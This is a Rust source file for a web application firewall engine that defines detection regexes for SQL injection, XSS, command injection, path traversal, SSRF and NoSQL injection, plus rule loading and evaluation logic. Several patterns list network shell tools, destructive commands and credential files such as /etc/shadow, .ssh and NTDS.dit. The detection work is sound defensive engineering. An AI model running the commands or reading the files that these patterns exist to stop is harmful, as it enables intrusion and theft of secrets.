synapse_pingora/waf/
engine.rs

1//! Core WAF rule engine implementation.
2
3use parking_lot::RwLock;
4use std::collections::HashMap;
5use std::sync::Arc;
6use std::time::{Duration, Instant};
7
8use base64::engine::general_purpose::STANDARD as BASE64_STANDARD;
9use base64::Engine as _;
10use once_cell::sync::Lazy;
11use percent_encoding::percent_decode_str;
12use regex::{Regex, RegexBuilder};
13
14/// Default timeout for rule evaluation (prevents DoS via complex regexes).
15/// 50ms is sufficient for most requests while catching pathological cases.
16pub const DEFAULT_EVAL_TIMEOUT: Duration = Duration::from_millis(50);
17
18/// Maximum timeout allowed (prevents disabling protection).
19pub const MAX_EVAL_TIMEOUT: Duration = Duration::from_millis(500);
20
21/// Maximum compiled regex size (ReDoS protection).
22/// 10MB limit prevents catastrophic memory/CPU usage from pathological patterns.
23const REGEX_SIZE_LIMIT: usize = 10 * (1 << 20);
24
25/// Maximum DFA size for regex matching (ReDoS protection).
26/// Limits the state machine size to prevent exponential blowup.
27const REGEX_DFA_SIZE_LIMIT: usize = 10 * (1 << 20);
28
29/// Maximum recursion depth for condition evaluation.
30const MAX_RECURSION_DEPTH: u32 = 10;
31
32use crate::waf::index::{
33    build_rule_index, get_candidate_rule_indices, method_to_mask, CandidateCache,
34    CandidateCacheKey, RuleIndex, REQ_ARGS, REQ_ARG_ENTRIES, REQ_BODY, REQ_JSON,
35};
36use crate::waf::rule::{MatchCondition, MatchValue, WafRule};
37use crate::waf::state::StateStore;
38use crate::waf::types::{Action, EvalContext, Request, RiskContribution, Verdict};
39use crate::waf::WafError;
40use crate::waf::{TraceEvent, TraceSink, TraceState};
41
42// Pre-compiled regex patterns for SQL/XSS detection
43#[allow(dead_code)]
44static BASE64_PATTERN: Lazy<Regex> =
45    Lazy::new(|| Regex::new(r"^([A-Za-z0-9+/]{4})*([A-Za-z0-9+/]{2,3}=)?$").expect("base64 regex"));
46
47static SQL_KEYWORDS: Lazy<Regex> = Lazy::new(|| {
48    RegexBuilder::new(r"\b(load_file|into outfile)\b")
49        .case_insensitive(true)
50        .build()
51        .expect("sql keywords regex")
52});
53
54static SQL_PHRASES: Lazy<Regex> = Lazy::new(|| {
55    RegexBuilder::new(
56        r"\b(insert\s+into|delete\s+from|drop\s+(table|database|view)|union\s+(all\s+)?select|select\s+\*\s+from|select\s+.*\s+from\s+information_schema)\b",
57    )
58    .case_insensitive(true)
59    .build()
60    .expect("sql phrases regex")
61});
62
63static SQL_OR_AND_EQ: Lazy<Regex> = Lazy::new(|| {
64    RegexBuilder::new(r"(\bor\b|\band\b)\s+\d+=\d+")
65        .case_insensitive(true)
66        .build()
67        .expect("sql or/and regex")
68});
69
70static SQL_COMMENT_1: Lazy<Regex> = Lazy::new(|| Regex::new(r"'\s*--").expect("sql comment 1"));
71static SQL_COMMENT_2: Lazy<Regex> = Lazy::new(|| Regex::new(r#""\s*--"#).expect("sql comment 2"));
72static SQL_SHUTDOWN: Lazy<Regex> = Lazy::new(|| {
73    RegexBuilder::new(r";\s*shutdown\b")
74        .case_insensitive(true)
75        .build()
76        .expect("sql shutdown")
77});
78
79static XSS_SCRIPT: Lazy<Regex> = Lazy::new(|| {
80    RegexBuilder::new(r"<\s*script\b")
81        .case_insensitive(true)
82        .build()
83        .expect("xss script")
84});
85static XSS_JS_SCHEME: Lazy<Regex> = Lazy::new(|| {
86    RegexBuilder::new(r"javascript:")
87        .case_insensitive(true)
88        .build()
89        .expect("xss js scheme")
90});
91static XSS_ON_ATTR: Lazy<Regex> = Lazy::new(|| {
92    RegexBuilder::new(
93        r"\b(onload|onclick|onerror|onmouseover|onfocus|onblur|onsubmit|onchange|oninput|onkeydown|onkeyup|onkeypress|onmousedown|onmouseup|onmousemove|onmouseout|onresize|onscroll|onunload)\s*=",
94    )
95    .case_insensitive(true)
96    .build()
97    .expect("xss on attr")
98});
99static XSS_COOKIE: Lazy<Regex> = Lazy::new(|| {
100    RegexBuilder::new(r"document\.cookie")
101        .case_insensitive(true)
102        .build()
103        .expect("xss cookie")
104});
105static XSS_IMG_SRC: Lazy<Regex> = Lazy::new(|| {
106    RegexBuilder::new(r"<\s*img[^>]+src")
107        .case_insensitive(true)
108        .build()
109        .expect("xss img src")
110});
111
112// Command injection detection patterns
113// SECURITY: These patterns detect OS command injection attempts
114
115/// Backtick command execution: `cmd`
116static CMD_BACKTICK: Lazy<Regex> =
117    Lazy::new(|| Regex::new(r"`[^`]+`").expect("cmd backtick regex"));
118
119/// $() command substitution: $(cmd)
120static CMD_SUBSHELL: Lazy<Regex> =
121    Lazy::new(|| Regex::new(r"\$\([^)]+\)").expect("cmd subshell regex"));
122
123/// Variable substitution patterns: ${IFS}, ${PATH}, ${variable}
124static CMD_VAR_SUBST: Lazy<Regex> =
125    Lazy::new(|| Regex::new(r"\$\{[^}]+\}").expect("cmd var subst regex"));
126
127/// IFS manipulation (common bypass technique)
128static CMD_IFS: Lazy<Regex> = Lazy::new(|| {
129    RegexBuilder::new(r"\$IFS|\$\{IFS\}|\bIFS\s*=")
130        .case_insensitive(true)
131        .build()
132        .expect("cmd IFS regex")
133});
134
135/// Shell metacharacters for command chaining: ; | && ||
136static CMD_CHAIN: Lazy<Regex> = Lazy::new(|| Regex::new(r"[;&|]{1,2}").expect("cmd chain regex"));
137
138/// Brace expansion: {cmd1,cmd2}
139static CMD_BRACE: Lazy<Regex> =
140    Lazy::new(|| Regex::new(r"\{[^}]*,[^}]*\}").expect("cmd brace regex"));
141
142/// Common dangerous commands (with word boundaries to avoid false positives)
143static CMD_DANGEROUS: Lazy<Regex> = Lazy::new(|| {
144    RegexBuilder::new(
145        r"\b(cat\s+/etc/|/etc/passwd|/etc/shadow|wget\s|curl\s|nc\s+-|ncat\s|netcat\s|bash\s+-|sh\s+-c|/bin/sh|/bin/bash|chmod\s+\+|chown\s|rm\s+-rf|mkfifo|mknod|python\s+-c|perl\s+-e|ruby\s+-e|php\s+-r|lua\s+-e|awk\s+|xargs\s)"
146    )
147    .case_insensitive(true)
148    .build()
149    .expect("cmd dangerous regex")
150});
151
152/// Encoded newline patterns (%0a, %0d, %0A, %0D)
153static CMD_NEWLINE_ENCODED: Lazy<Regex> = Lazy::new(|| {
154    RegexBuilder::new(r"%0[aAdD]")
155        .case_insensitive(true)
156        .build()
157        .expect("cmd newline encoded regex")
158});
159
160/// Literal newline/carriage return in parameter values
161static CMD_NEWLINE_LITERAL: Lazy<Regex> =
162    Lazy::new(|| Regex::new(r"[\r\n]").expect("cmd newline literal regex"));
163
164/// Redirection operators: > >> < 2>&1
165static CMD_REDIRECT: Lazy<Regex> =
166    Lazy::new(|| Regex::new(r"[<>]{1,2}|2>&1|&>").expect("cmd redirect regex"));
167
168/// Path traversal combined with command execution
169static CMD_PATH_TRAVERSAL: Lazy<Regex> =
170    Lazy::new(|| Regex::new(r"\.{2,}/+").expect("cmd path traversal regex"));
171
172/// Null byte injection (can truncate strings in some contexts)
173static CMD_NULL_BYTE: Lazy<Regex> = Lazy::new(|| {
174    RegexBuilder::new(r"%00|\\x00|\\0")
175        .case_insensitive(true)
176        .build()
177        .expect("cmd null byte regex")
178});
179
180// Path traversal detection patterns
181// SECURITY: These patterns detect directory traversal attacks including encoding bypasses
182
183/// Basic path traversal: ../, ..\, ....//
184static PATH_TRAV_BASIC: Lazy<Regex> =
185    Lazy::new(|| Regex::new(r"\.{2,}[/\\]+|\.{2,}$").expect("path trav basic regex"));
186
187/// URL-encoded path traversal: %2e%2e%2f, %2e%2e/, ..%2f
188static PATH_TRAV_ENCODED: Lazy<Regex> = Lazy::new(|| {
189    RegexBuilder::new(r"%2e%2e[%/\\]|\.\.%2f|\.\.%5c|%2e%2e$")
190        .case_insensitive(true)
191        .build()
192        .expect("path trav encoded regex")
193});
194
195/// Double URL-encoded path traversal: %252e%252e%252f
196static PATH_TRAV_DOUBLE: Lazy<Regex> = Lazy::new(|| {
197    RegexBuilder::new(r"%25(?:2e|2E){2}%25(?:2f|2F|5c|5C)")
198        .case_insensitive(true)
199        .build()
200        .expect("path trav double encoded regex")
201});
202
203/// Unicode/overlong UTF-8 encoded path traversal
204/// %c0%ae = overlong encoding of '.'
205/// %c0%af = overlong encoding of '/'
206/// %c1%9c = overlong encoding of '\'
207static PATH_TRAV_UNICODE: Lazy<Regex> = Lazy::new(|| {
208    RegexBuilder::new(r"%c0%ae|%c0%af|%c1%9c|%c0%9v|%c1%1c|%c0%2e|%e0%80%ae|%f0%80%80%ae")
209        .case_insensitive(true)
210        .build()
211        .expect("path trav unicode regex")
212});
213
214/// Backslash variants for Windows paths
215static PATH_TRAV_BACKSLASH: Lazy<Regex> = Lazy::new(|| {
216    RegexBuilder::new(r"\.\.\\|%5c%2e%2e|%2e%2e%5c")
217        .case_insensitive(true)
218        .build()
219        .expect("path trav backslash regex")
220});
221
222/// Sensitive path targets (Unix)
223static PATH_TRAV_TARGETS_UNIX: Lazy<Regex> = Lazy::new(|| {
224    Regex::new(r"/etc/(passwd|shadow|group|hosts|sudoers|ssh/|crontab)|/proc/|/dev/|/var/log/|/root/|\.ssh/|\.bash_history|\.env")
225        .expect("path trav targets unix regex")
226});
227
228/// Sensitive path targets (Windows)
229static PATH_TRAV_TARGETS_WIN: Lazy<Regex> = Lazy::new(|| {
230    RegexBuilder::new(
231        r"boot\.ini|win\.ini|system32|windows\\system|SAM|NTDS\.dit|web\.config|machine\.config",
232    )
233    .case_insensitive(true)
234    .build()
235    .expect("path trav targets win regex")
236});
237
238/// Null byte injection for path truncation: file.php%00.jpg
239static PATH_TRAV_NULL: Lazy<Regex> = Lazy::new(|| {
240    RegexBuilder::new(r"%00|\\x00|\\0|\x00")
241        .case_insensitive(true)
242        .build()
243        .expect("path trav null regex")
244});
245
246// SSRF (Server-Side Request Forgery) detection patterns
247// SECURITY: These patterns detect SSRF attempts targeting internal services and cloud metadata
248
249/// IPv4 localhost patterns: 127.0.0.1, 127.0.0.0/8
250static SSRF_LOCALHOST_V4: Lazy<Regex> = Lazy::new(|| {
251    Regex::new(r"(?i)(?://|@)127\.(?:\d{1,3}\.){2}\d{1,3}(?:[:/]|$)")
252        .expect("ssrf localhost v4 regex")
253});
254
255/// IPv6 localhost patterns: ::1, [::1], 0:0:0:0:0:0:0:1
256static SSRF_LOCALHOST_V6: Lazy<Regex> = Lazy::new(|| {
257    Regex::new(r"(?i)(?://|@)\[?(?:::1|0:0:0:0:0:0:0:1)\]?(?:[:/]|$)")
258        .expect("ssrf localhost v6 regex")
259});
260
261/// IPv6-mapped IPv4 bypass attempts: ::ffff:127.0.0.1, ::ffff:169.254.169.254
262static SSRF_MAPPED_IPV6: Lazy<Regex> = Lazy::new(|| {
263    Regex::new(r"(?i)(?://|@)\[?::ffff:(?:\d{1,3}\.){3}\d{1,3}\]?(?:[:/]|$)")
264        .expect("ssrf mapped ipv6 regex")
265});
266
267/// Cloud metadata endpoints: 169.254.169.254, 169.254.170.2 (AWS ECS)
268static SSRF_CLOUD_METADATA: Lazy<Regex> = Lazy::new(|| {
269    Regex::new(r"(?i)(?://|@)169\.254\.(?:169\.254|170\.2)(?:[:/]|$)")
270        .expect("ssrf cloud metadata regex")
271});
272
273/// AWS/GCP/Azure metadata hostnames
274static SSRF_METADATA_HOST: Lazy<Regex> = Lazy::new(|| {
275    RegexBuilder::new(r"(?://|@)(?:metadata\.google\.internal|metadata\.azure\.com|instance-data\.ec2\.internal|169\.254\.169\.254)")
276        .case_insensitive(true)
277        .build()
278        .expect("ssrf metadata host regex")
279});
280
281/// Private IPv4 ranges: 10.x.x.x, 192.168.x.x, 172.16-31.x.x
282static SSRF_PRIVATE_IP: Lazy<Regex> = Lazy::new(|| {
283    Regex::new(r"(?i)(?://|@)(?:10\.(?:\d{1,3}\.){2}\d{1,3}|192\.168\.(?:\d{1,3}\.)\d{1,3}|172\.(?:1[6-9]|2\d|3[01])\.(?:\d{1,3}\.)\d{1,3})(?:[:/]|$)")
284        .expect("ssrf private ip regex")
285});
286
287/// Link-local addresses: 169.254.0.0/16 (excluding cloud metadata which is handled separately)
288static SSRF_LINK_LOCAL: Lazy<Regex> = Lazy::new(|| {
289    Regex::new(r"(?i)(?://|@)169\.254\.(?:\d{1,3}\.)\d{1,3}(?:[:/]|$)")
290        .expect("ssrf link local regex")
291});
292
293/// Dangerous URL schemes that can be used for SSRF
294/// file://, gopher://, dict://, ldap://, expect://, php://, data:, jar://
295/// Note: data: URIs don't use // so we match data: separately
296static SSRF_DANGEROUS_SCHEME: Lazy<Regex> = Lazy::new(|| {
297    RegexBuilder::new(r"(?:^|[^a-z0-9])(?:(?:file|gopher|dict|ldap|ldaps|expect|php|phar|jar|ftp|tftp|ssh2)://|data:)")
298        .case_insensitive(true)
299        .build()
300        .expect("ssrf dangerous scheme regex")
301});
302
303/// Decimal/octal/hex IP encoding bypasses: 2130706433, 0x7f000001, 017700000001
304static SSRF_ENCODED_IP: Lazy<Regex> = Lazy::new(|| {
305    // Decimal localhost: 2130706433 = 127.0.0.1
306    // Hex localhost: 0x7f000001 = 127.0.0.1
307    // Octal localhost: 017700000001 (varies by system)
308    Regex::new(r"(?i)(?://|@)(?:0x[0-9a-f]{8}|2130706433|017700000001|\d{8,10})(?:[:/]|$)")
309        .expect("ssrf encoded ip regex")
310});
311
312// NoSQL Injection detection patterns
313// SECURITY: These patterns detect MongoDB, CouchDB, and other NoSQL injection attacks
314
315/// MongoDB operator injection: $where, $ne, $gt, $lt, $gte, $lte, $in, $nin, $regex, etc.
316static NOSQL_MONGO_OPERATORS: Lazy<Regex> = Lazy::new(|| {
317    // Match MongoDB operators in JSON context with various quote styles
318    Regex::new(r#"(?i)["\']?\$(?:where|ne|gt|lt|gte|lte|in|nin|regex|exists|type|mod|all|size|elemMatch|meta|slice|comment|rand|natural|or|and|not|nor|expr|jsonSchema|text|geoWithin|geoIntersects|near|nearSphere)["\']?\s*:"#)
319        .expect("nosql mongo operators regex")
320});
321
322/// MongoDB $where JavaScript execution (HIGH RISK)
323static NOSQL_WHERE_JS: Lazy<Regex> = Lazy::new(|| {
324    // Match $where with function or JavaScript code
325    Regex::new(r#"(?i)["\']?\$where["\']?\s*:\s*["\']?(?:function\s*\(|this\.|sleep\(|db\.|new\s+Date|tojson|printjson)"#)
326        .expect("nosql where js regex")
327});
328
329/// MongoDB authentication bypass: {"password": {"$ne": null}}
330static NOSQL_AUTH_BYPASS: Lazy<Regex> = Lazy::new(|| {
331    Regex::new(r#"(?i)(?:password|passwd|pwd|user|username|login|email)["\']?\s*:\s*\{\s*["\']?\$(?:ne|gt|lt|gte|lte|exists)["\']?\s*:"#)
332        .expect("nosql auth bypass regex")
333});
334
335/// MongoDB aggregation pipeline injection
336static NOSQL_AGGREGATION: Lazy<Regex> = Lazy::new(|| {
337    Regex::new(r#"(?i)["\']?\$(?:lookup|unwind|group|project|match|sort|limit|skip|out|merge|addFields|replaceRoot)["\']?\s*:"#)
338        .expect("nosql aggregation regex")
339});
340
341/// CouchDB injection patterns: _all_docs, _view, _design
342static NOSQL_COUCHDB: Lazy<Regex> = Lazy::new(|| {
343    Regex::new(r"(?i)(?:_all_docs|_design/|_view/|_changes|_bulk_docs|_find)")
344        .expect("nosql couchdb regex")
345});
346
347/// Redis command injection patterns
348static NOSQL_REDIS: Lazy<Regex> = Lazy::new(|| {
349    RegexBuilder::new(r"\b(?:EVAL|EVALSHA|SCRIPT|DEBUG|FLUSHALL|FLUSHDB|CONFIG|SHUTDOWN|SLAVEOF|REPLICAOF|MIGRATE|DUMP|RESTORE|KEYS|SCAN)\b")
350        .case_insensitive(true)
351        .build()
352        .expect("nosql redis regex")
353});
354
355/// Cassandra CQL injection patterns
356static NOSQL_CASSANDRA: Lazy<Regex> = Lazy::new(|| {
357    RegexBuilder::new(
358        r"\b(?:ALLOW\s+FILTERING|USING\s+TTL|USING\s+TIMESTAMP|TOKEN\s*\(|WRITETIME\s*\()\b",
359    )
360    .case_insensitive(true)
361    .build()
362    .expect("nosql cassandra regex")
363});
364
365/// JSON injection patterns (prototype pollution, __proto__)
366static JSON_PROTO_POLLUTION: Lazy<Regex> = Lazy::new(|| {
367    Regex::new(r#"(?i)["\']?(?:__proto__|constructor|prototype)["\']?\s*:"#)
368        .expect("json proto pollution regex")
369});
370
371/// Compiled rules and indices for fast swapping (labs-tui optimization).
372pub struct CompiledRules {
373    pub rules: Vec<WafRule>,
374    pub rule_id_to_index: HashMap<u32, usize>,
375    pub rule_index: RuleIndex,
376    pub regex_cache: HashMap<String, Regex>,
377    pub word_regex_cache: HashMap<String, Regex>,
378}
379
380/// Main WAF rule engine.
381pub struct Engine {
382    rules: Vec<WafRule>,
383    rule_id_to_index: HashMap<u32, usize>,
384    rule_index: RuleIndex,
385    regex_cache: HashMap<String, Regex>,
386    word_regex_cache: HashMap<String, Regex>,
387    store: RwLock<StateStore>,
388    candidate_cache: RwLock<CandidateCache>,
389    /// Maximum risk score (100.0 default, 1000.0 for extended range).
390    max_risk: RwLock<f64>,
391    /// Whether to apply repeat offender multipliers.
392    enable_repeat_multipliers: RwLock<bool>,
393}
394
395impl Engine {
396    /// Create an empty engine with no rules.
397    pub fn empty() -> Self {
398        Self {
399            rules: Vec::new(),
400            rule_id_to_index: HashMap::new(),
401            rule_index: RuleIndex::default(),
402            regex_cache: HashMap::new(),
403            word_regex_cache: HashMap::new(),
404            store: RwLock::new(StateStore::default()),
405            candidate_cache: RwLock::new(CandidateCache::new(2048)),
406            max_risk: RwLock::new(100.0),
407            enable_repeat_multipliers: RwLock::new(true),
408        }
409    }
410
411    /// Set maximum risk score (100.0 default, 1000.0 for extended range).
412    pub fn set_max_risk(&self, max_risk: f64) {
413        *self.max_risk.write() = max_risk;
414    }
415
416    /// Get maximum risk score.
417    pub fn max_risk(&self) -> f64 {
418        *self.max_risk.read()
419    }
420
421    /// Enable or disable repeat offender multipliers.
422    pub fn set_repeat_multipliers(&self, enabled: bool) {
423        *self.enable_repeat_multipliers.write() = enabled;
424    }
425
426    /// Load rules from JSON bytes.
427    pub fn load_rules(&mut self, json: &[u8]) -> Result<usize, WafError> {
428        let compiled = self.precompute_rules(json)?;
429        let count = compiled.rules.len();
430        self.reload_from_compiled(compiled);
431        Ok(count)
432    }
433
434    /// Precompute all rule structures including regex compilation.
435    ///
436    /// This is an expensive operation that should happen outside of global locks.
437    pub fn precompute_rules(&self, json: &[u8]) -> Result<CompiledRules, WafError> {
438        let rules: Vec<WafRule> =
439            serde_json::from_slice(json).map_err(|e| WafError::ParseError(e.to_string()))?;
440
441        let rule_id_to_index = rules
442            .iter()
443            .enumerate()
444            .map(|(idx, rule)| (rule.id, idx))
445            .collect();
446
447        let rule_index = build_rule_index(&rules);
448
449        let mut regex_cache = HashMap::new();
450        let mut word_regex_cache = HashMap::new();
451
452        // Pre-compile regex patterns
453        let mut patterns = Vec::<String>::new();
454        let mut words = Vec::<String>::new();
455        for rule in &rules {
456            for cond in &rule.matches {
457                collect_regex_patterns(cond, &mut patterns);
458                collect_word_values(cond, &mut words);
459            }
460        }
461
462        patterns.sort();
463        patterns.dedup();
464        for pattern in patterns {
465            let compiled = RegexBuilder::new(&pattern)
466                .multi_line(true)
467                .size_limit(REGEX_SIZE_LIMIT)
468                .dfa_size_limit(REGEX_DFA_SIZE_LIMIT)
469                .build()
470                .map_err(|e| WafError::RegexError(format!("'{pattern}': {e}")))?;
471            regex_cache.insert(pattern, compiled);
472        }
473
474        words.sort();
475        words.dedup();
476        for word in words {
477            let pattern = format!(r"(?i)\b{}\b", regex::escape(&word));
478            let compiled = RegexBuilder::new(&pattern)
479                .multi_line(true)
480                .size_limit(REGEX_SIZE_LIMIT)
481                .dfa_size_limit(REGEX_DFA_SIZE_LIMIT)
482                .build()
483                .map_err(|e| WafError::RegexError(format!("word '{word}': {e}")))?;
484            word_regex_cache.insert(word, compiled);
485        }
486
487        Ok(CompiledRules {
488            rules,
489            rule_id_to_index,
490            rule_index,
491            regex_cache,
492            word_regex_cache,
493        })
494    }
495
496    /// Fast swap of rule state using precomputed data.
497    pub fn reload_from_compiled(&mut self, compiled: CompiledRules) {
498        self.rules = compiled.rules;
499        self.rule_id_to_index = compiled.rule_id_to_index;
500        self.rule_index = compiled.rule_index;
501        self.regex_cache = compiled.regex_cache;
502        self.word_regex_cache = compiled.word_regex_cache;
503        self.candidate_cache.write().clear();
504    }
505
506    /// Parse rules from JSON bytes without modifying engine state.
507    pub fn parse_rules(json: &[u8]) -> Result<Vec<WafRule>, WafError> {
508        serde_json::from_slice(json).map_err(|e| WafError::ParseError(e.to_string()))
509    }
510
511    /// Reload the engine with a new set of rules.
512    pub fn reload_rules(&mut self, rules: Vec<WafRule>) -> Result<(), WafError> {
513        self.rules = rules;
514        self.rule_id_to_index = self
515            .rules
516            .iter()
517            .enumerate()
518            .map(|(idx, rule)| (rule.id, idx))
519            .collect();
520        self.rule_index = build_rule_index(&self.rules);
521        self.candidate_cache.write().clear();
522        self.regex_cache.clear();
523        self.word_regex_cache.clear();
524
525        // Pre-compile regex patterns
526        let mut patterns = Vec::<String>::new();
527        let mut words = Vec::<String>::new();
528        for rule in &self.rules {
529            for cond in &rule.matches {
530                collect_regex_patterns(cond, &mut patterns);
531                collect_word_values(cond, &mut words);
532            }
533        }
534
535        patterns.sort();
536        patterns.dedup();
537        for pattern in patterns {
538            let compiled = RegexBuilder::new(&pattern)
539                .multi_line(true)
540                .size_limit(REGEX_SIZE_LIMIT)
541                .dfa_size_limit(REGEX_DFA_SIZE_LIMIT)
542                .build()
543                .map_err(|e| WafError::RegexError(format!("'{pattern}': {e}")))?;
544            self.regex_cache.insert(pattern, compiled);
545        }
546
547        words.sort();
548        words.dedup();
549        for word in words {
550            let pattern = format!(r"(?i)\b{}\b", regex::escape(&word));
551            let compiled = RegexBuilder::new(&pattern)
552                .multi_line(true)
553                .size_limit(REGEX_SIZE_LIMIT)
554                .dfa_size_limit(REGEX_DFA_SIZE_LIMIT)
555                .build()
556                .map_err(|e| WafError::RegexError(format!("word '{word}': {e}")))?;
557            self.word_regex_cache.insert(word, compiled);
558        }
559
560        Ok(())
561    }
562
563    /// Get the number of loaded rules.
564    pub fn rule_count(&self) -> usize {
565        self.rules.len()
566    }
567
568    /// Analyze a request and return a verdict.
569    pub fn analyze(&self, req: &Request) -> Verdict {
570        let ctx = EvalContext::from_request(req);
571        let mut trace_state = TraceState::disabled();
572        self.evaluate_with_trace(&ctx, &mut trace_state)
573    }
574
575    /// Analyze a request and emit evaluation trace events.
576    pub fn analyze_with_trace(&self, req: &Request, trace: &mut dyn TraceSink) -> Verdict {
577        let ctx = EvalContext::from_request(req);
578        let mut trace_state = TraceState::enabled(trace);
579        let start = Instant::now();
580        let verdict = self.evaluate_with_trace(&ctx, &mut trace_state);
581        let detection_time_us = start.elapsed().as_micros() as u64;
582
583        if trace_state.is_enabled() {
584            trace_state.emit(TraceEvent::EvaluationFinished {
585                verdict: if matches!(verdict.action, Action::Block) {
586                    "block".to_string()
587                } else {
588                    "allow".to_string()
589                },
590                risk_score: verdict.risk_score,
591                matched_rules: verdict.matched_rules.clone(),
592                timed_out: verdict.timed_out,
593                rules_evaluated: verdict.rules_evaluated,
594                detection_time_us,
595            });
596        }
597
598        verdict
599    }
600
601    /// Analyze a request with a timeout to prevent DoS via complex regexes.
602    ///
603    /// # Arguments
604    /// * `req` - The request to analyze
605    /// * `timeout` - Maximum time allowed for rule evaluation (capped at MAX_EVAL_TIMEOUT)
606    ///
607    /// # Returns
608    /// A `Verdict` with `timed_out=true` if evaluation exceeded the deadline.
609    /// Partial results (rules evaluated before timeout) are still included.
610    pub fn analyze_with_timeout(&self, req: &Request, timeout: Duration) -> Verdict {
611        let effective_timeout = timeout.min(MAX_EVAL_TIMEOUT);
612        let deadline = Instant::now() + effective_timeout;
613        let ctx = EvalContext::from_request_with_deadline(req, deadline);
614        let mut trace_state = TraceState::disabled();
615        self.evaluate_with_trace(&ctx, &mut trace_state)
616    }
617
618    /// Analyze a request with the default timeout (DEFAULT_EVAL_TIMEOUT).
619    pub fn analyze_safe(&self, req: &Request) -> Verdict {
620        self.analyze_with_timeout(req, DEFAULT_EVAL_TIMEOUT)
621    }
622
623    fn evaluate_with_trace(&self, ctx: &EvalContext, trace: &mut TraceState) -> Verdict {
624        let mut matched_rules = Vec::new();
625        let mut total_risk = 0.0;
626        let mut should_block = false;
627        let mut timed_out = false;
628        let mut rules_evaluated: u32 = 0;
629        let risk_contributions: Vec<RiskContribution> = Vec::new();
630
631        // Get risk config
632        let max_risk = *self.max_risk.read();
633        let _enable_multipliers = *self.enable_repeat_multipliers.read();
634
635        // Get candidate rules using index
636        let method_bit = method_to_mask(ctx.method).unwrap_or(0);
637        let uri = ctx.url;
638        let available_features = compute_available_features(ctx);
639        let header_mask = compute_request_header_mask(&self.rule_index, &ctx.headers);
640        let cache_key = CandidateCacheKey {
641            method_bit,
642            available_features,
643            is_static: ctx.is_static,
644            header_mask,
645        };
646
647        // Try reading from cache first (requires write lock due to LRU tracking)
648        let cached = self.candidate_cache.write().get(&cache_key, uri);
649        let candidates: Arc<[usize]> = match cached {
650            Some(v) => v,
651            None => {
652                // Compute and write to cache
653                let computed = get_candidate_rule_indices(
654                    &self.rule_index,
655                    method_bit,
656                    uri,
657                    available_features,
658                    ctx.is_static,
659                    header_mask,
660                    self.rules.len(),
661                    safe_percent_decode,
662                );
663                let candidates: Arc<[usize]> = Arc::from(computed);
664                self.candidate_cache
665                    .write()
666                    .insert(cache_key, uri.to_string(), candidates.clone());
667                candidates
668            }
669        };
670
671        if trace.is_enabled() {
672            trace.emit(TraceEvent::EvaluationStarted {
673                method: ctx.method.to_string(),
674                uri: ctx.url.to_string(),
675                candidate_rules: candidates.len(),
676            });
677        }
678
679        // Evaluate each candidate rule with timeout checking
680        for &rule_idx in candidates.iter() {
681            // Check deadline before each rule evaluation
682            if ctx.is_deadline_exceeded() {
683                timed_out = true;
684                break;
685            }
686
687            let rule = &self.rules[rule_idx];
688            rules_evaluated += 1;
689
690            if trace.is_enabled() {
691                trace.emit(TraceEvent::RuleStart { rule_id: rule.id });
692            }
693
694            let matched = self.eval_rule(rule, ctx, trace);
695
696            if trace.is_enabled() {
697                trace.emit(TraceEvent::RuleEnd {
698                    rule_id: rule.id,
699                    matched,
700                    risk: rule.effective_risk(),
701                    blocking: rule.blocking.unwrap_or(false),
702                });
703            }
704
705            if matched {
706                matched_rules.push(rule.id);
707                total_risk += rule.effective_risk();
708                if rule.blocking.unwrap_or(false) {
709                    should_block = true;
710                }
711            }
712        }
713
714        // Compute risk score (clamped to max_risk)
715        let risk_score = total_risk.min(max_risk).max(0.0) as u16;
716
717        Verdict {
718            action: if should_block {
719                Action::Block
720            } else {
721                Action::Allow
722            },
723            risk_score,
724            matched_rules,
725            entity_risk: 0.0,
726            entity_blocked: false,
727            block_reason: if should_block {
728                Some("Rule-based block".to_string())
729            } else if timed_out {
730                Some("Evaluation timeout (partial result)".to_string())
731            } else {
732                None
733            },
734            risk_contributions,
735            endpoint_template: None,
736            endpoint_risk: None,
737            anomaly_score: None,
738            adjusted_threshold: None,
739            anomaly_signals: Vec::new(),
740            timed_out,
741            rules_evaluated: if timed_out {
742                Some(rules_evaluated)
743            } else {
744                None
745            },
746        }
747    }
748
749    fn eval_rule(&self, rule: &WafRule, ctx: &EvalContext, trace: &mut TraceState) -> bool {
750        for cond in &rule.matches {
751            if !self.eval_condition(cond, ctx, None, trace, rule.id, 0) {
752                return false;
753            }
754        }
755        true
756    }
757
758    fn eval_condition(
759        &self,
760        condition: &MatchCondition,
761        ctx: &EvalContext,
762        value: Option<&str>,
763        trace: &mut TraceState,
764        rule_id: u32,
765        depth: u32,
766    ) -> bool {
767        if depth >= MAX_RECURSION_DEPTH {
768            return false;
769        }
770
771        let matched = match condition.kind.as_str() {
772            "boolean" => self.eval_boolean(condition, ctx, value, trace, rule_id, depth),
773            "method" => self.eval_method(condition, ctx, trace, rule_id, depth),
774            "uri" => self.eval_uri(condition, ctx, trace, rule_id, depth),
775            "args" => self.eval_args(condition, ctx, trace, rule_id, depth),
776            "named_argument" => self.eval_named_argument(condition, ctx, trace, rule_id, depth),
777            "header" => self.eval_header(condition, ctx, trace, rule_id, depth),
778            "contains" => eval_contains(condition.match_value.as_ref(), value),
779            "starts_with" => eval_starts_with(condition.match_value.as_ref(), value),
780            "equals" => eval_equals(condition.match_value.as_ref(), value),
781            "regex" => self.eval_regex(condition.match_value.as_ref(), value),
782            "word" => self.eval_word(condition.match_value.as_ref(), value),
783            "multiple_contains" => eval_multiple_contains(condition.match_value.as_ref(), value),
784            "to_lowercase" => match value {
785                Some(v) => {
786                    let lowered = v.to_lowercase();
787                    condition
788                        .match_value
789                        .as_ref()
790                        .and_then(|m| m.as_cond())
791                        .map(|child| {
792                            self.eval_condition(
793                                child,
794                                ctx,
795                                Some(&lowered),
796                                trace,
797                                rule_id,
798                                depth + 1,
799                            )
800                        })
801                        .unwrap_or(true)
802                }
803                None => false,
804            },
805            "percent_decode" => match value {
806                Some(v) => {
807                    let decoded = safe_percent_decode(v);
808                    condition
809                        .match_value
810                        .as_ref()
811                        .and_then(|m| m.as_cond())
812                        .map(|child| {
813                            self.eval_condition(
814                                child,
815                                ctx,
816                                Some(&decoded),
817                                trace,
818                                rule_id,
819                                depth + 1,
820                            )
821                        })
822                        .unwrap_or(false)
823                }
824                None => false,
825            },
826            "decode_if_base64" => match value {
827                Some(v) => {
828                    let decoded = decode_if_base64(v);
829                    condition
830                        .match_value
831                        .as_ref()
832                        .and_then(|m| m.as_cond())
833                        .map(|child| {
834                            self.eval_condition(
835                                child,
836                                ctx,
837                                Some(&decoded),
838                                trace,
839                                rule_id,
840                                depth + 1,
841                            )
842                        })
